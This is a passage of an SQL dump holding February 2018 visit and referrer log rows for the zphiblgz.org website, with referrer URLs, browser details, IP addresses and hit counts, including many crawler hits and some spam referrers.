98.26','000',2,0),(24049,'2018-02-21','http://zphiblgz.org/','Edge','Macintosh','36.04004','','212.83.178.42','000',2,0),(24050,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.214.55','000',2,0),(24051,'2018-02-22','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(24052,'2018-02-22','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',5,0),(24053,'2018-02-22','https://pfrf-kabinet.ru/','Unknown','Unknown','Unknown','','134.249.48.151','000',3,0),(24054,'2018-02-22','https://pills24h.com/buy-doxazosin-online-without-prescription/','MSIE','Windows','6.0','','178.137.162.218','000',3,0),(24055,'2018-02-22','http://zphiblgz.org/download/constitution-by-laws/','Firefox','Windows','33.1','','146.185.223.111','000',1,0),(24056,'2018-02-22','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.73.64','000',19,0),(24057,'2018-02-22','https://pillscheap24h.com/','MSIE','Windows','6.0','','178.137.16.45','000',2,0),(24058,'2018-02-22','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','173.64.123.159','000',1,0),(24059,'2018-02-22','https://zphiblgz.org','python-requests','Unknown','2.9.1','','105.154.78.235','000',14,0),(24060,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.172','000',3,0),(24061,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',1,0),(24062,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.140','000',1,0),(24063,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.146','000',1,0),(24064,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.170','000',1,0),(24065,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',1,0),(24066,'2018-02-22','http://www.etotupo.ru/','MSIE','Windows','5.0','','134.249.48.151','000',1,0),(24067,'2018-02-22','https://zphiblgz.org/scholarship/application/?gf_token=d2444ae118b047e5879f54c7d2478f82','Chrome','Macintosh','64.0.3282.167','','50.225.39.69','000',1,0),(24068,'2018-02-22','https://www.google.com/','Chrome','Windows','64.0.3282.167','','50.225.39.81','000',4,0),(24069,'2018-02-22','http://www.zphibmaryland.org/chapters/','Chrome','Windows','64.0.3282.167','','71.121.233.139','000',4,0),(24070,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',1,0),(24071,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.234','000',1,0),(24072,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.117','000',1,0),(24073,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',2,0),(24074,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.212','000',1,0),(24075,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.114','000',1,0),(24076,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',1,0),(24077,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',1,0),(24078,'2018-02-22','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(24079,'2018-02-22','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(24080,'2018-02-22','https://www.google.com/','Safari','iPhone','11.0','','192.135.209.3','000',2,0),(24081,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.119','000',2,0),(24082,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',3,0),(24083,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',2,0),(24084,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',2,0),(24085,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',3,0),(24086,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',2,0),(24087,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.205','000',2,0),(24088,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(24089,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.173','000',1,0),(24090,'2018-02-22','https://zphiblgz.org','Firefox','Macintosh','58.0','','173.120.225.21','000',2,0),(24091,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.67','000',1,0),(24092,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',2,0),(24093,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.215','000',1,0),(24094,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',1,0),(24095,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',2,0),(24096,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',2,0),(24097,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.24','000',1,0),(24098,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.27','000',2,0),(24099,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.70','000',3,0),(24100,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.242','000',2,0),(24101,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.31','000',1,0),(24102,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.102','000',1,0),(24103,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.228','000',3,0),(24104,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',3,0),(24105,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.86','000',1,0),(24106,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',1,0),(24107,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',1,0),(24108,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.212.116','000',2,0),(24109,'2018-02-22','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','172.58.185.251','000',3,0),(24110,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.200','000',1,0),(24111,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.68','000',2,0),(24112,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.89','000',1,0),(24113,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.52','000',2,0),(24114,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(24115,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',1,0),(24116,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',1,0),(24117,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.226','000',1,0),(24118,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',1,0),(24119,'2018-02-22','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.167','','71.244.254.120','000',2,0),(24120,'2018-02-22','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','129.2.181.157','000',2,0),(24121,'2018-02-22','https://www.google.com/','Chrome','Windows','63.0.3239.132','','209.51.76.136','000',3,0),(24122,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.75','000',3,0),(24123,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.52','000',1,0),(24124,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.114','000',1,0),(24125,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.88','000',2,0),(24126,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.22','000',1,0),(24127,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.192','000',1,0),(24128,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.204','000',1,0),(24129,'2018-02-22','https://owa.howardcc.edu/owa/','Chrome','Windows','63.0.3239.132','','204.126.132.241','000',3,0),(24130,'2018-02-22','https://zphiblgz.org','Firefox','Macintosh','52.0','','50.225.39.71','000',2,0),(24131,'2018-02-22','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(24132,'2018-02-22','https://zphiblgz.org','Chrome','iPhone','64.0.3282.112','','204.148.116.202','000',4,0),(24133,'2018-02-22','https://zphiblgz.org','SamsungBrowser','Android','6.4','','166.137.240.63','000',1,0),(24134,'2018-02-22','https://zphiblgz.org','SamsungBrowser','Android','6.4','','107.77.202.26','000',2,0),(24135,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.128','000',3,0),(24136,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.160','000',1,0),(24137,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',1,0),(24138,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.217','000',1,0),(24139,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.209','000',1,0),(24140,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.119','000',4,0),(24141,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.121','000',3,0),(24142,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',1,0),(24143,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',1,0),(24144,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.73','000',1,0),(24145,'2018-02-22','https://zphiblgz.org','Chrome','Unknown','64.0.3264.0','','138.197.96.143','000',3,0),(24146,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.57','000',4,0),(24147,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.198','000',1,0),(24148,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.87','000',2,0),(24149,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.196','000',1,0),(24150,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.66','000',1,0),(24151,'2018-02-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(24152,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.131','000',1,0),(24153,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.214','000',5,0),(24154,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.159','000',1,0),(24155,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.158','000',1,0),(24156,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.100','000',2,0),(24157,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.206','000',2,0),(24158,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',3,0),(24159,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.4','000',2,0),(24160,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.147','000',1,0),(24161,'2018-02-22','http://makler.org.ua/','Unknown','Unknown','Unknown','','46.118.116.121','000',1,0),(24162,'2018-02-22','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.31','000',1,0),(24163,'2018-02-22','https://natprof.ru/','MSIE','Windows','7.0a1','','178.137.162.218','000',2,0),(24164,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.182','000',1,0),(24165,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.150','000',3,0),(24166,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.71','000',2,0),(24167,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.84','000',1,0),(24168,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.154','000',1,0),(24169,'2018-02-22','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(24170,'2018-02-22','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(24171,'2018-02-22','https://zphiblgz.org','Firefox','Windows','52.0','','8.44.100.11','000',7,0),(24172,'2018-02-22','https://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.205.2.36','000',2,0),(24173,'2018-02-22','https://zphiblgz.org','Chrome','Android','59.0.3071.125','','96.255.58.177','000',9,0),(24174,'2018-02-22','https://zphiblgz.org','Firefox','Android','58.0','','38.105.72.33','000',3,0),(24175,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.143','000',2,0),(24176,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(24177,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.179','000',2,0),(24178,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.34','000',1,0),(24179,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.184','000',1,0),(24180,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.50','000',1,0),(24181,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.25','000',1,0),(24182,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.200','000',1,0),(24183,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.202','000',1,0),(24184,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.50','000',1,0),(24185,'2018-02-22','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(24186,'2018-02-22','https://zphiblgz.org','Chrome','Windows','63.0.3239.108','','155.178.180.14','000',3,0),(24187,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.188','000',1,0),(24188,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',1,0),(24189,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.25','000',1,0),(24190,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.118','000',3,0),(24191,'2018-02-22','http://zphiblgz.org/contact/','Firefox','Windows','33.1','','185.135.82.211','000',1,0),(24192,'2018-02-22','https://zphiblgz.org','Firefox','Macintosh','52.0','','71.179.88.19','000',7,0),(24193,'2018-02-22','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(24194,'2018-02-22','https://www.google.com/','Safari','iPhone','11.0','','76.21.197.228','000',2,0),(24195,'2018-02-22','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(24196,'2018-02-22','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.97.125','000',1,0),(24197,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',1,0),(24198,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.9','000',3,0),(24199,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',1,0),(24200,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',1,0),(24201,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.21','000',3,0),(24202,'2018-02-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(24203,'2018-02-22','https://www.bing.com/','Edge','Windows','16.16299','','73.129.22.251','000',2,0),(24204,'2018-02-22','https://www.google.com/','Chrome','Windows','63.0.3239.132','','73.204.177.24','000',2,0),(24205,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.112','000',1,0),(24206,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',2,0),(24207,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.168','000',2,0),(24208,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',2,0),(24209,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.197','000',1,0),(24210,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',1,0),(24211,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.135','000',2,0),(24212,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',2,0),(24213,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.96','000',1,0),(24214,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.7','000',1,0),(24215,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(24216,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.51','000',1,0),(24217,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',1,0),(24218,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.186','000',1,0),(24219,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.18','000',1,0),(24220,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',4,0),(24221,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(24222,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.12','000',1,0),(24223,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.113','000',1,0),(24224,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.194','000',1,0),(24225,'2018-02-22','http://zphiblgz.org','Opera','Windows','8.50','','195.22.127.175','000',2,0),(24226,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.183','000',1,0),(24227,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.44','000',2,0),(24228,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.104','000',1,0),(24229,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.54','000',1,0),(24230,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.119','000',2,0),(24231,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.106.117','000',1,0),(24232,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.90','000',3,0),(24233,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.11','000',1,0),(24234,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',1,0),(24235,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.181','000',1,0),(24236,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.23','000',2,0),(24237,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',1,0),(24238,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.207','000',1,0),(24239,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',1,0),(24240,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.138','000',1,0),(24241,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',1,0),(24242,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.10','000',1,0),(24243,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.194','000',1,0),(24244,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',1,0),(24245,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.50','000',1,0),(24246,'2018-02-22','https://zphiblgz.org','Firefox','Android','58.0','','108.56.0.231','000',3,0),(24247,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.113','000',2,0),(24248,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.247','000',1,0),(24249,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.228','000',2,0),(24250,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.15','000',1,0),(24251,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.148','000',3,0),(24252,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.180','000',2,0),(24253,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',2,0),(24254,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.187','000',1,0),(24255,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',2,0),(24256,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',2,0),(24257,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',1,0),(24258,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',1,0),(24259,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.243','000',1,0),(24260,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.106','000',1,0),(24261,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.69','000',1,0),(24262,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.142','000',1,0),(24263,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.35','000',1,0),(24264,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.116','000',1,0),(24265,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.202','000',1,0),(24266,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',1,0),(24267,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',1,0),(24268,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',1,0),(24269,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',2,0),(24270,'2018-02-22','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.167','','76.100.48.104','000',2,0),(24271,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.23','000',1,0),(24272,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',1,0),(24273,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.199','000',3,0),(24274,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.205','000',1,0),(24275,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.28','000',1,0),(24276,'2018-02-22','https://zphiblgz.org','Edge','Windows','16.16299','','96.255.187.158','000',3,0),(24277,'2018-02-22','https://zphiblgz.org','Firefox','Windows','34.0','','192.187.101.178','000',2,0),(24278,'2018-02-22','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.30','000',1,0),(24279,'2018-02-22','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(24280,'2018-02-22','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(24281,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.214','000',1,0),(24282,'2018-02-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',2,0),(24283,'2018-02-22','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','11.0.3','','73.163.54.169','000',3,0),(24284,'2018-02-23','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','23.91.71.228','000',1,0),(24285,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.193','000',2,0),(24286,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',2,0),(24287,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',1,0),(24288,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',1,0),(24289,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.119','000',1,0),(24290,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.116','000',5,0),(24291,'2018-02-23','http://superoboi.com.ua/','MSIE','Windows','6.0','','46.118.116.121','000',3,0),(24292,'2018-02-23','https://td-l-market.ru/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(24293,'2018-02-23','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',5,0),(24294,'2018-02-23','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',2,0),(24295,'2018-02-23','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(24296,'2018-02-23','android-app://com.google.android.googlequicksearchbox','Chrome','Android','64.0.3282.137','','73.39.133.197','000',2,0),(24297,'2018-02-23','http://pospektr.ru/','MSIE','Windows','6.0','','178.137.16.45','000',6,0),(24298,'2018-02-23','https://vsdelke.ru/','MSIE','Windows','7.0','','178.137.162.218','000',2,0),(24299,'2018-02-23','https://zphiblgz.org','Chrome','iPhone','64.0.3282.112','','68.134.25.149','000',4,0),(24300,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',1,0),(24301,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',2,0),(24302,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',3,0),(24303,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',2,0),(24304,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',1,0),(24305,'2018-02-23','https://zphiblgz.org','Firefox','Windows','40.1','','98.124.36.194','000',2,0),(24306,'2018-02-23','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.25.237','000',1,0),(24307,'2018-02-23','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(24308,'2018-02-23','https://kazka.ru/','Unknown','Unknown','Unknown','','37.115.112.228','000',2,0),(24309,'2018-02-23','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','105.105.238.93','000',2,0),(24310,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.54','000',1,0),(24311,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',3,0),(24312,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',1,0),(24313,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.50','000',1,0),(24314,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.115','000',1,0),(24315,'2018-02-23','https://zphiblgz.org/scholarship/','MSIE','Windows','11.0','','73.133.120.5','000',1,0),(24316,'2018-02-23','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(24317,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.151','000',2,0),(24318,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.140','000',3,0),(24319,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',3,0),(24320,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',1,0),(24321,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.18','000',1,0),(24322,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(24323,'2018-02-23','https://zphiblgz.org/scholarship/','Chrome','Macintosh','64.0.3282.167','','50.225.39.70','000',1,0),(24324,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',1,0),(24325,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.117','000',1,0),(24326,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.114','000',1,0),(24327,'2018-02-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.118','000',1,0),(24328,'2018-02-23','https://zphiblgz.or